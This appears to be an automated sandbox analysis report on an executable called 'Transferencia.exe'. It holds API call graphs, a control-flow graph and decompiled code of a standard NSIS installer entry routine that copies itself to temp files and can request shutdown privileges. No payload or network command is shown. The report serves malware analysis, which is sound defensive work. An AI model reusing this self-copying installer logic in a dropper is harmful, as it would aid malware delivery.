5791->5794 5798 4046c1 CheckDlgButton 5793->5798 5814 4048e4 5795->5814 5800 404884 5796->5800 5801 404874 SendMessageW 5796->5801 5797 4047cc 5803 4048c0 SendMessageW 5797->5803 5811 404498 KiUserCallbackDispatcher 5798->5811 5800->5794 5802 40488a SendMessageW 5800->5802 5801->5800 5802->5794 5803->5782 5806 4046df GetDlgItem 5812 4044ab SendMessageW 5806->5812 5808 4046f5 SendMessageW 5809 404712 GetSysColor 5808->5809 5810 40471b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5808->5810 5809->5810 5810->5794 5811->5806 5812->5808 5813->5797 5817 405b40 ShellExecuteExW 5814->5817 5816 40484a LoadCursorW SetCursor 5816->5788 5817->5816 5818 401735 5819 402da6 17 API calls 5818->5819 5820 40173c SearchPathW 5819->5820 5821 401757 5820->5821 5822 4014b8 5823 4014be 5822->5823 5824 401389 2 API calls 5823->5824 5825 4014c6 5824->5825 5826 401d38 5827 402d84 17 API calls 5826->5827 5828 401d3f 5827->5828 5829 402d84 17 API calls 5828->5829 5830 401d4b GetDlgItem 5829->5830 5831 402638 5830->5831 4972 4056bb 4973 405865 4972->4973 4974 4056dc GetDlgItem GetDlgItem GetDlgItem 4972->4974 4976 405896 4973->4976 4977 40586e GetDlgItem CreateThread FindCloseChangeNotification 4973->4977 5018 4044ab SendMessageW 4974->5018 4979 4058c1 4976->4979 4980 4058e6 4976->4980 4981 4058ad ShowWindow ShowWindow 4976->4981 4977->4976 5021 40564f 5 API calls 4977->5021 4978 40574c 4985 405753 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4978->4985 4982 405921 4979->4982 4983 4058cd 4979->4983 4984 4044dd 8 API calls 4980->4984 5020 4044ab SendMessageW 4981->5020 4982->4980 4995 40592f SendMessageW 4982->4995 4987 4058d5 4983->4987 4988 4058fb ShowWindow 4983->4988 4990 4058f4 4984->4990 4993 4057c1 4985->4993 4994 4057a5 SendMessageW SendMessageW 4985->4994 4989 40444f SendMessageW 4987->4989 4991 40591b 4988->4991 4992 40590d 4988->4992 4989->4980 4997 40444f SendMessageW 4991->4997 4996 40557c 24 API calls 4992->4996 4998 4057d4 4993->4998 4999 4057c6 SendMessageW 4993->4999 4994->4993 4995->4990 5000 405948 CreatePopupMenu 4995->5000 4996->4991 4997->4982 5002 404476 18 API calls 4998->5002 4999->4998 5001 406557 17 API calls 5000->5001 5003 405958 AppendMenuW 5001->5003 5004 4057e4 5002->5004 5007 405975 GetWindowRect 5003->5007 5008 405988 TrackPopupMenu 5003->5008 5005 405821 GetDlgItem SendMessageW 5004->5005 5006 4057ed ShowWindow 5004->5006 5005->4990 5011 405848 SendMessageW SendMessageW 5005->5011 5009 405803 ShowWindow 5006->5009 5012 405810 5006->5012 5007->5008 5008->4990 5010 4059a3 5008->5010 5009->5012 5013 4059bf SendMessageW 5010->5013 5011->4990 5019 4044ab SendMessageW 5012->5019 5013->5013 5014 4059dc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5013->5014 5016 405a01 SendMessageW 5014->5016 5016->5016 5017 405a2a GlobalUnlock SetClipboardData CloseClipboard 5016->5017 5017->4990 5018->4978 5019->5005 5020->4979 5832 404cbd 5833 404ce9 5832->5833 5834 404ccd 5832->5834 5835 404d1c 5833->5835 5836 404cef SHGetPathFromIDListW 5833->5836 5843 405b5e GetDlgItemTextW 5834->5843 5838 404d06 SendMessageW 5836->5838 5839 404cff 5836->5839 5838->5835 5841 40140b 2 API calls 5839->5841 5840 404cda SendMessageW 5840->5833 5841->5838 5843->5840 5844 40263e 5845 402652 5844->5845 5846 40266d 5844->5846 5847 402d84 17 API calls 5845->5847 5848 402672 5846->5848 5849 40269d 5846->5849 5858 402659 5847->5858 5850 402da6 17 API calls 5848->5850 5851 402da6 17 API calls 5849->5851 5853 402679 5850->5853 5852 4026a4 lstrlenW 5851->5852 5852->5858 5861 40653c WideCharToMultiByte 5853->5861 5855 40268d lstrlenA 5855->5858 5856 4026e7 5857 4026d1 5857->5856 5859 4060bc WriteFile 5857->5859 5858->5856 5858->5857 5860 4060eb 5 API calls 5858->5860 5859->5856 5860->5857 5861->5855

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 40350a-40355a SetErrorMode GetVersionExW 1 403594-40359b 0->1 2 40355c-403590 GetVersionExW 0->2 3 4035a5-4035e5 1->3 4 40359d 1->4 2->1 5 4035e7-4035ef call 4068e7 3->5 6 4035f8 3->6 4->3 5->6 11 4035f1 5->11 8 4035fd-403611 call 406877 lstrlenA 6->8 13 403613-40362f call 4068e7 * 3 8->13 11->6 20 403640-4036a2 #17 OleInitialize SHGetFileInfoW call 40651a GetCommandLineW call 40651a 13->20 21 403631-403637 13->21 28 4036a4-4036a6 20->28 29 4036ab-4036be call 405e16 CharNextW 20->29 21->20 25 403639 21->25 25->20 28->29 32 4037b5-4037bb 29->32 33 4037c1 32->33 34 4036c3-4036c9 32->34 35 4037d5-4037ef GetTempPathW call 4034d9 33->35 36 4036d2-4036d8 34->36 37 4036cb-4036d0 34->37 46 4037f1-40380f GetWindowsDirectoryW lstrcatW call 4034d9 35->46 47 403847-40385f DeleteFileW call 40307d 35->47 39 4036da-4036de 36->39 40 4036df-4036e3 36->40 37->36 37->37 39->40 41 4037a3-4037b1 call 405e16 40->41 42 4036e9-4036ef 40->42 41->32 57 4037b3-4037b4 41->57 44 4036f1-4036f8 42->44 45 403709-403742 42->45 49 4036fa-4036fd 44->49 50 4036ff 44->50 51 403744-403749 45->51 52 40375e-403798 45->52 46->47 66 403811-403841 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034d9 46->66 62 403865-40386b 47->62 63 403a36-403a44 call 403aef OleUninitialize 47->63 49->45 49->50 50->45 51->52 58 40374b-403753 51->58 60 4037a0-4037a2 52->60 61 40379a-40379e 52->61 57->32 64 403755-403758 58->64 65 40375a 58->65 60->41 61->60 67 4037c3-4037d0 call 40651a 61->67 68 403871-403884 call 405e16 62->68 69 403912-403919 call 403bc9 62->69 79 403a46-403a55 call 405b7a ExitProcess 63->79 80 403a5b-403a61 63->80 64->52 64->65 65->52 66->47 66->63 67->35 81 4038d6-4038e3 68->81 82 403886-4038bb 68->82 78 40391e-403921 69->78 78->63 84 403a63-403a78 GetCurrentProcess OpenProcessToken 80->84 85 403ad9-403ae1 80->85 89 4038e5-4038f3 call 405ef1 81->89 90 403926-40393a call 405ae5 lstrcatW 81->90 86 4038bd-4038c1 82->86 92 403aa9-403ab7 call 4068e7 84->92 93 403a7a-403aa3 LookupPrivilegeValueW AdjustTokenPrivileges 84->93 87 403ae3 85->87 88 403ae6-403ae9 ExitProcess 85->88 95 4038c3-4038c8 86->95 96 4038ca-4038d2 86->96 87->88 89->63 107 4038f9-40390f call 40651a * 2 89->107 105 403947-403961 lstrcatW lstrcmpiW 90->105 106 40393c-403942 lstrcatW 90->106 103 403ac5-403ad0 ExitWindowsEx 92->103 104 403ab9-403ac3 92->104 93->92 95->96 100 4038d4 95->100 96->86 96->100 100->81 103->85 108 403ad2-403ad4 call 40140b 103->108 104->103 104->108 109 403a34 105->109 110 403967-40396a 105->110 106->105 107->69 108->85 109->63 115 403973 call 405ac8 110->115 116 40396c-403971 call 405a4b 110->116 120 403978-403988 SetCurrentDirectoryW 115->120 116->120 123 403995-4039c1 call 40651a 120->123 124 40398a-403990 call 40651a 120->124 128 4039c6-4039e1 call 406557 DeleteFileW 123->128 124->123 131 403a21-403a2b 128->131 132 4039e3-4039f3 CopyFileW 128->132 131->128 133 403a2d-403a2f call 4062da 131->133 132->131 134 4039f5-403a15 call 4062da call 406557 call 405afd 132->134 133->109 134->131 142 403a17-403a1e CloseHandle 134->142 142->131
                                                C-Code - Quality: 79%
                                                			_entry_() {
                                                				WCHAR* _v8;
                                                				signed int _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				int _v24;
                                                				int _v28;
                                                				struct _TOKEN_PRIVILEGES _v40;
                                                				signed char _v42;
                                                				int _v44;
                                                				signed int _v48;
                                                				intOrPtr _v278;
                                                				signed short _v310;
                                                				struct _OSVERSIONINFOW _v324;
                                                				struct _SHFILEINFOW _v1016;
                                                				intOrPtr* _t88;
                                                				WCHAR* _t92;
                                                				char* _t94;
                                                				void _t97;
                                                				void* _t116;
                                                				WCHAR* _t118;
                                                				signed int _t120;
                                                				intOrPtr* _t124;
                                                				void* _t138;
                                                				void* _t144;
                                                				void* _t149;
                                                				void* _t153;
                                                				void* _t158;
                                                				signed int _t168;
                                                				void* _t171;
                                                				void* _t176;
                                                				intOrPtr _t178;
                                                				intOrPtr _t179;
                                                				intOrPtr* _t180;
                                                				int _t189;
                                                				void* _t190;
                                                				void* _t199;
                                                				signed int _t205;
                                                				signed int _t210;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				int* _t219;
                                                				signed int _t227;
                                                				signed int _t230;
                                                				CHAR* _t232;
                                                				char* _t233;
                                                				signed int _t234;
                                                				WCHAR* _t235;
                                                				void* _t251;
                                                
                                                				_t217 = 0x20;
                                                				_t189 = 0;
                                                				_v24 = 0;
                                                				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                				_v20 = 0;
                                                				SetErrorMode(0x8001); // executed
                                                				_v324.szCSDVersion = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				_v324.dwOSVersionInfoSize = 0x11c;
                                                				if(GetVersionExW( &_v324) == 0) {
                                                					_v324.dwOSVersionInfoSize = 0x114;
                                                					GetVersionExW( &_v324);
                                                					asm("sbb eax, eax");
                                                					_v42 = 4;
                                                					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                				}
                                                				if(_v324.dwMajorVersion < 0xa) {
                                                					_v310 = _v310 & 0x00000000;
                                                				}
                                                				 *0x7a8b18 = _v324.dwBuildNumber;
                                                				 *0x7a8b1c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                				if( *0x7a8b1e != 0x600) {
                                                					_t180 = E004068E7(_t189);
                                                					if(_t180 != _t189) {
                                                						 *_t180(0xc00);
                                                					}
                                                				}
                                                				_t232 = "UXTHEME";
                                                				do {
                                                					E00406877(_t232); // executed
                                                					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                				} while ( *_t232 != 0);
                                                				E004068E7(0xb);
                                                				 *0x7a8a64 = E004068E7(9);
                                                				_t88 = E004068E7(7);
                                                				if(_t88 != _t189) {
                                                					_t88 =  *_t88(0x1e);
                                                					if(_t88 != 0) {
                                                						 *0x7a8b1c =  *0x7a8b1c | 0x00000080;
                                                					}
                                                				}
                                                				__imp__#17();
                                                				__imp__OleInitialize(_t189); // executed
                                                				 *0x7a8b20 = _t88;
                                                				SHGetFileInfoW(0x79ff08, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                				E0040651A(0x7a7a60, L"NSIS Error");
                                                				_t92 = GetCommandLineW();
                                                				_t233 = L"\"C:\\Users\\jones\\Desktop\\Transferencia.exe\" ";
                                                				E0040651A(_t233, _t92);
                                                				_t94 = _t233;
                                                				_t234 = 0x22;
                                                				 *0x7a8a60 = 0x400000;
                                                				_t251 = L"\"C:\\Users\\jones\\Desktop\\Transferencia.exe\" " - _t234; // 0x22
                                                				if(_t251 == 0) {
                                                					_t217 = _t234;
                                                					_t94 =  &M007B3002;
                                                				}
                                                				_t199 = CharNextW(E00405E16(_t94, _t217));
                                                				_v16 = _t199;
                                                				while(1) {
                                                					_t97 =  *_t199;
                                                					_t252 = _t97 - _t189;
                                                					if(_t97 == _t189) {
                                                						break;
                                                					}
                                                					_t210 = 0x20;
                                                					__eflags = _t97 - _t210;
                                                					if(_t97 != _t210) {
                                                						L17:
                                                						__eflags =  *_t199 - _t234;
                                                						_v12 = _t210;
                                                						if( *_t199 == _t234) {
                                                							_v12 = _t234;
                                                							_t199 = _t199 + 2;
                                                							__eflags = _t199;
                                                						}
                                                						__eflags =  *_t199 - 0x2f;
                                                						if( *_t199 != 0x2f) {
                                                							L32:
                                                							_t199 = E00405E16(_t199, _v12);
                                                							__eflags =  *_t199 - _t234;
                                                							if(__eflags == 0) {
                                                								_t199 = _t199 + 2;
                                                								__eflags = _t199;
                                                							}
                                                							continue;
                                                						} else {
                                                							_t199 = _t199 + 2;
                                                							__eflags =  *_t199 - 0x53;
                                                							if( *_t199 != 0x53) {
                                                								L24:
                                                								asm("cdq");
                                                								asm("cdq");
                                                								_t215 = L"NCRC" & 0x0000ffff;
                                                								asm("cdq");
                                                								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                									L29:
                                                									asm("cdq");
                                                									asm("cdq");
                                                									_t210 = L" /D=" & 0x0000ffff;
                                                									asm("cdq");
                                                									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                										L31:
                                                										_t234 = 0x22;
                                                										goto L32;
                                                									}
                                                									__eflags =  *_t199 - _t230;
                                                									if( *_t199 == _t230) {
                                                										 *(_t199 - 4) = _t189;
                                                										__eflags = _t199;
                                                										E0040651A(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t199);
                                                										L37:
                                                										_t235 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                										GetTempPathW(0x400, _t235);
                                                										_t116 = E004034D9(_t199, _t252);
                                                										_t253 = _t116;
                                                										if(_t116 != 0) {
                                                											L40:
                                                											DeleteFileW(L"1033"); // executed
                                                											_t118 = E0040307D(_t255, _v20); // executed
                                                											_v8 = _t118;
                                                											if(_t118 != _t189) {
                                                												L68:
                                                												E00403AEF();
                                                												__imp__OleUninitialize();
                                                												if(_v8 == _t189) {
                                                													if( *0x7a8af4 == _t189) {
                                                														L77:
                                                														_t120 =  *0x7a8b0c;
                                                														if(_t120 != 0xffffffff) {
                                                															_v24 = _t120;
                                                														}
                                                														ExitProcess(_v24);
                                                													}
                                                													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                														_v40.PrivilegeCount = 1;
                                                														_v28 = 2;
                                                														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                													}
                                                													_t124 = E004068E7(4);
                                                													if(_t124 == _t189) {
                                                														L75:
                                                														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                															goto L77;
                                                														}
                                                														goto L76;
                                                													} else {
                                                														_push(0x80040002);
                                                														_push(0x25);
                                                														_push(_t189);
                                                														_push(_t189);
                                                														_push(_t189);
                                                														if( *_t124() == 0) {
                                                															L76:
                                                															E0040140B(9);
                                                															goto L77;
                                                														}
                                                														goto L75;
                                                													}
                                                												}
                                                												E00405B7A(_v8, 0x200010);
                                                												ExitProcess(2);
                                                											}
                                                											if( *0x7a8a7c == _t189) {
                                                												L51:
                                                												 *0x7a8b0c =  *0x7a8b0c | 0xffffffff;
                                                												_v24 = E00403BC9(_t265);
                                                												goto L68;
                                                											}
                                                											_t219 = E00405E16(L"\"C:\\Users\\jones\\Desktop\\Transferencia.exe\" ", _t189);
                                                											if(_t219 < L"\"C:\\Users\\jones\\Desktop\\Transferencia.exe\" ") {
                                                												L48:
                                                												_t264 = _t219 - L"\"C:\\Users\\jones\\Desktop\\Transferencia.exe\" ";
                                                												_v8 = L"Error launching installer";
                                                												if(_t219 < L"\"C:\\Users\\jones\\Desktop\\Transferencia.exe\" ") {
                                                													_t190 = E00405AE5(__eflags);
                                                													lstrcatW(_t235, L"~nsu");
                                                													__eflags = _t190;
                                                													if(_t190 != 0) {
                                                														lstrcatW(_t235, "A");
                                                													}
                                                													lstrcatW(_t235, L".tmp");
                                                													_t138 = lstrcmpiW(_t235, 0x7b4800);
                                                													__eflags = _t138;
                                                													if(_t138 == 0) {
                                                														L67:
                                                														_t189 = 0;
                                                														__eflags = 0;
                                                														goto L68;
                                                													} else {
                                                														__eflags = _t190;
                                                														_push(_t235);
                                                														if(_t190 == 0) {
                                                															E00405AC8();
                                                														} else {
                                                															E00405A4B();
                                                														}
                                                														SetCurrentDirectoryW(_t235);
                                                														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                                                														if(__eflags == 0) {
                                                															E0040651A(L"C:\\Users\\jones\\AppData\\Local\\Temp", 0x7b4800);
                                                														}
                                                														E0040651A(0x7a9000, _v16);
                                                														_t202 = "A" & 0x0000ffff;
                                                														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                														__eflags = _t144;
                                                														_v12 = 0x1a;
                                                														 *0x7a9800 = _t144;
                                                														do {
                                                															E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x120)));
                                                															DeleteFileW(0x79f708);
                                                															__eflags = _v8;
                                                															if(_v8 != 0) {
                                                																_t149 = CopyFileW(L"C:\\Users\\jones\\Desktop\\Transferencia.exe", 0x79f708, 1);
                                                																__eflags = _t149;
                                                																if(_t149 != 0) {
                                                																	E004062DA(_t202, 0x79f708, 0);
                                                																	E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x124)));
                                                																	_t153 = E00405AFD(0x79f708);
                                                																	__eflags = _t153;
                                                																	if(_t153 != 0) {
                                                																		CloseHandle(_t153);
                                                																		_v8 = 0;
                                                																	}
                                                																}
                                                															}
                                                															 *0x7a9800 =  *0x7a9800 + 1;
                                                															_t61 =  &_v12;
                                                															 *_t61 = _v12 - 1;
                                                															__eflags =  *_t61;
                                                														} while ( *_t61 != 0);
                                                														E004062DA(_t202, _t235, 0);
                                                														goto L67;
                                                													}
                                                												}
                                                												 *_t219 = _t189;
                                                												_t222 =  &(_t219[2]);
                                                												_t158 = E00405EF1(_t264,  &(_t219[2]));
                                                												_t265 = _t158;
                                                												if(_t158 == 0) {
                                                													goto L68;
                                                												}
                                                												E0040651A(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t222);
                                                												E0040651A(0x7b4000, _t222);
                                                												_v8 = _t189;
                                                												goto L51;
                                                											}
                                                											asm("cdq");
                                                											asm("cdq");
                                                											asm("cdq");
                                                											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                												_t219 = _t219;
                                                												if(_t219 >= L"\"C:\\Users\\jones\\Desktop\\Transferencia.exe\" ") {
                                                													continue;
                                                												}
                                                												break;
                                                											}
                                                											_t189 = 0;
                                                											goto L48;
                                                										}
                                                										GetWindowsDirectoryW(_t235, 0x3fb);
                                                										lstrcatW(_t235, L"\\Temp");
                                                										_t171 = E004034D9(_t199, _t253);
                                                										_t254 = _t171;
                                                										if(_t171 != 0) {
                                                											goto L40;
                                                										}
                                                										GetTempPathW(0x3fc, _t235);
                                                										lstrcatW(_t235, L"Low");
                                                										SetEnvironmentVariableW(L"TEMP", _t235);
                                                										SetEnvironmentVariableW(L"TMP", _t235);
                                                										_t176 = E004034D9(_t199, _t254);
                                                										_t255 = _t176;
                                                										if(_t176 == 0) {
                                                											goto L68;
                                                										}
                                                										goto L40;
                                                									}
                                                									goto L31;
                                                								}
                                                								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                									goto L29;
                                                								}
                                                								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                								__eflags = _t178 - 0x20;
                                                								if(_t178 == 0x20) {
                                                									L28:
                                                									_t36 =  &_v20;
                                                									 *_t36 = _v20 | 0x00000004;
                                                									__eflags =  *_t36;
                                                									goto L29;
                                                								}
                                                								__eflags = _t178 - _t189;
                                                								if(_t178 != _t189) {
                                                									goto L29;
                                                								}
                                                								goto L28;
                                                							}
                                                							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                							__eflags = _t179 - _t210;
                                                							if(_t179 == _t210) {
                                                								L23:
                                                								 *0x7a8b00 = 1;
                                                								goto L24;
                                                							}
                                                							__eflags = _t179 - _t189;
                                                							if(_t179 != _t189) {
                                                								goto L24;
                                                							}
                                                							goto L23;
                                                						}
                                                					} else {
                                                						goto L16;
                                                					}
                                                					do {
                                                						L16:
                                                						_t199 = _t199 + 2;
                                                						__eflags =  *_t199 - _t210;
                                                					} while ( *_t199 == _t210);
                                                					goto L17;
                                                				}
                                                				goto L37;
                                                			}



















































                                                0x00403518
                                                0x00403519
                                                0x00403520
                                                0x00403523
                                                0x0040352a
                                                0x0040352d
                                                0x00403540
                                                0x00403546
                                                0x00403549
                                                0x0040354c
                                                0x0040355a
                                                0x00403562
                                                0x0040356d
                                                0x00403586
                                                0x00403588
                                                0x00403590
                                                0x00403590
                                                0x0040359b
                                                0x0040359d
                                                0x0040359d
                                                0x004035b2
                                                0x004035d7
                                                0x004035e5
                                                0x004035e8
                                                0x004035ef
                                                0x004035f6
                                                0x004035f6
                                                0x004035ef
                                                0x004035f8
                                                0x004035fd
                                                0x004035fe
                                                0x0040360a
                                                0x0040360e
                                                0x00403615
                                                0x00403623
                                                0x00403628
                                                0x0040362f
                                                0x00403633
                                                0x00403637
                                                0x00403639
                                                0x00403639
                                                0x00403637
                                                0x00403640
                                                0x00403647
                                                0x0040364d
                                                0x00403665
                                                0x00403675
                                                0x0040367a
                                                0x00403680
                                                0x00403687
                                                0x0040368e
                                                0x00403690
                                                0x00403691
                                                0x0040369b
                                                0x004036a2
                                                0x004036a4
                                                0x004036a6
                                                0x004036a6
                                                0x004036b9
                                                0x004036bb
                                                0x004037b5
                                                0x004037b5
                                                0x004037b8
                                                0x004037bb
                                                0x00000000
                                                0x00000000
                                                0x004036c5
                                                0x004036c6
                                                0x004036c9
                                                0x004036d2
                                                0x004036d2
                                                0x004036d5
                                                0x004036d8
                                                0x004036db
                                                0x004036de
                                                0x004036de
                                                0x004036de
                                                0x004036df
                                                0x004036e3
                                                0x004037a3
                                                0x004037ac
                                                0x004037ae
                                                0x004037b1
                                                0x004037b4
                                                0x004037b4
                                                0x004037b4
                                                0x00000000
                                                0x004036e9
                                                0x004036ea
                                                0x004036eb
                                                0x004036ef
                                                0x00403709
                                                0x00403710
                                                0x00403723
                                                0x00403724
                                                0x00403739
                                                0x0040373e
                                                0x00403740
                                                0x00403742
                                                0x0040375e
                                                0x00403765
                                                0x00403778
                                                0x00403779
                                                0x0040378e
                                                0x00403794
                                                0x00403796
                                                0x00403798
                                                0x004037a0
                                                0x004037a2
                                                0x00000000
                                                0x004037a2
                                                0x0040379c
                                                0x0040379e
                                                0x004037c3
                                                0x004037c7
                                                0x004037d0
                                                0x004037d5
                                                0x004037db
                                                0x004037e6
                                                0x004037e8
                                                0x004037ed
                                                0x004037ef
                                                0x00403847
                                                0x0040384c
                                                0x00403855
                                                0x0040385c
                                                0x0040385f
                                                0x00403a36
                                                0x00403a36
                                                0x00403a3b
                                                0x00403a44
                                                0x00403a61
                                                0x00403ad9
                                                0x00403ad9
                                                0x00403ae1
                                                0x00403ae3
                                                0x00403ae3
                                                0x00403ae9
                                                0x00403ae9
                                                0x00403a78
                                                0x00403a84
                                                0x00403a95
                                                0x00403a9c
                                                0x00403aa3
                                                0x00403aa3
                                                0x00403aab
                                                0x00403ab7
                                                0x00403ac5
                                                0x00403ad0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403ab9
                                                0x00403ab9
                                                0x00403aba
                                                0x00403abc
                                                0x00403abd
                                                0x00403abe
                                                0x00403ac3
                                                0x00403ad2
                                                0x00403ad4
                                                0x00000000
                                                0x00403ad4
                                                0x00000000
                                                0x00403ac3
                                                0x00403ab7
                                                0x00403a4e
                                                0x00403a55
                                                0x00403a55
                                                0x0040386b
                                                0x00403912
                                                0x00403912
                                                0x0040391e
                                                0x00000000
                                                0x0040391e
                                                0x0040387c
                                                0x00403884
                                                0x004038d6
                                                0x004038d6
                                                0x004038dc
                                                0x004038e3
                                                0x00403931
                                                0x00403933
                                                0x00403938
                                                0x0040393a
                                                0x00403942
                                                0x00403942
                                                0x0040394d
                                                0x00403959
                                                0x0040395f
                                                0x00403961
                                                0x00403a34
                                                0x00403a34
                                                0x00403a34
                                                0x00000000
                                                0x00403967
                                                0x00403967
                                                0x00403969
                                                0x0040396a
                                                0x00403973
                                                0x0040396c
                                                0x0040396c
                                                0x0040396c
                                                0x00403979
                                                0x00403981
                                                0x00403988
                                                0x00403990
                                                0x00403990
                                                0x0040399d
                                                0x004039a9
                                                0x004039b3
                                                0x004039b3
                                                0x004039b5
                                                0x004039bc
                                                0x004039c6
                                                0x004039d2
                                                0x004039d8
                                                0x004039de
                                                0x004039e1
                                                0x004039eb
                                                0x004039f1
                                                0x004039f3
                                                0x004039f7
                                                0x00403a08
                                                0x00403a0e
                                                0x00403a13
                                                0x00403a15
                                                0x00403a18
                                                0x00403a1e
                                                0x00403a1e
                                                0x00403a15
                                                0x004039f3
                                                0x00403a21
                                                0x00403a28
                                                0x00403a28
                                                0x00403a28
                                                0x00403a28
                                                0x00403a2f
                                                0x00000000
                                                0x00403a2f
                                                0x00403961
                                                0x004038e5
                                                0x004038e8
                                                0x004038ec
                                                0x004038f1
                                                0x004038f3
                                                0x00000000
                                                0x00000000
                                                0x004038ff
                                                0x0040390a
                                                0x0040390f
                                                0x00000000
                                                0x0040390f
                                                0x0040388d
                                                0x004038a5
                                                0x004038b6
                                                0x004038b7
                                                0x004038bb
                                                0x004038bd
                                                0x004038cb
                                                0x004038d2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004038d2
                                                0x004038d4
                                                0x00000000
                                                0x004038d4
                                                0x004037f7
                                                0x00403803
                                                0x00403808
                                                0x0040380d
                                                0x0040380f
                                                0x00000000
                                                0x00000000
                                                0x00403817
                                                0x0040381f
                                                0x00403830
                                                0x00403838
                                                0x0040383a
                                                0x0040383f
                                                0x00403841
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403841
                                                0x00000000
                                                0x0040379e
                                                0x00403747
                                                0x00403749
                                                0x00000000
                                                0x00000000
                                                0x0040374b
                                                0x0040374f
                                                0x00403753
                                                0x0040375a
                                                0x0040375a
                                                0x0040375a
                                                0x0040375a
                                                0x00000000
                                                0x0040375a
                                                0x00403755
                                                0x00403758
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403758
                                                0x004036f1
                                                0x004036f5
                                                0x004036f8
                                                0x004036ff
                                                0x004036ff
                                                0x00000000
                                                0x004036ff
                                                0x004036fa
                                                0x004036fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004036fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004036cb
                                                0x004036cb
                                                0x004036cc
                                                0x004036cd
                                                0x004036cd
                                                0x00000000
                                                0x004036cb
                                                0x00000000

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008001), ref: 0040352D
                                                • GetVersionExW.KERNEL32(?), ref: 00403556
                                                • GetVersionExW.KERNEL32(0000011C), ref: 0040356D
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403604
                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403640
                                                • OleInitialize.OLE32(00000000), ref: 00403647
                                                • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 00403665
                                                • GetCommandLineW.KERNEL32(007A7A60,NSIS Error), ref: 0040367A
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Transferencia.exe" ,00000020,"C:\Users\user\Desktop\Transferencia.exe" ,00000000), ref: 004036B3
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037E6
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037F7
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403803
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403817
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381F
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403830
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403838
                                                • DeleteFileW.KERNELBASE(1033), ref: 0040384C
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403933
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403942
